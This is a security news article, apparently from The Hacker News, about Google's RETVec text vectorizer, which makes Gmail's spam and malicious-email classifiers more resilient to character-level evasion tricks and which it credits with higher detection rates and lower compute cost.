Google Unveils RETVec - Gmail's New Defense Against Spam and Malicious Emails
1.12.23 Safety The Hacker News
Google has revealed a new multilingual text vectorizer called RETVec (short for Resilient and Efficient Text Vectorizer) to help detect potentially harmful content such as spam and malicious emails in Gmail.
"RETVec is trained to be resilient against character-level manipulations including insertion, deletion, typos, homoglyphs, LEET substitution, and more," according to the project's description on GitHub.
"The RETVec model is trained on top of a novel character encoder which can encode all UTF-8 characters and words efficiently."
While huge platforms like Gmail and YouTube rely on text classification models to spot phishing attacks, inappropriate comments, and scams, threat actors are known to devise counter-strategies to bypass these defense measures.
They have been observed resorting to adversarial text manipulations, which range from the use of homoglyphs to keyword stuffing to invisible characters.
RETVec, which works on over 100 languages out-of-the-box, aims to help build more resilient and efficient server-side and on-device text classifiers, while also being more robust and computationally less expensive.
Vectorization is a methodology in natural language processing (NLP) to map words or phrases from vocabulary to a corresponding numerical representation in order to perform further analysis, such as sentiment analysis, text classification, and named entity recognition.
"Due to its novel architecture, RETVec works out-of-the-box on every language and all UTF-8 characters without the need for text preprocessing, making it the ideal candidate for on-device, web, and large-scale text classification deployments," Google's Elie Bursztein and Marina Zhang noted.
The tech giant said the integration of the vectorizer to Gmail improved the spam detection rate over the baseline by 38% and reduced the false positive rate by 19.4%. It also lowered the Tensor Processing Unit (TPU) usage of the model by 83%.
"Models trained with RETVec exhibit faster inference speed due to its compact representation. Having smaller models reduces computational costs and decreases latency, which is critical for large-scale applications and on-device models," Bursztein and Zhang added.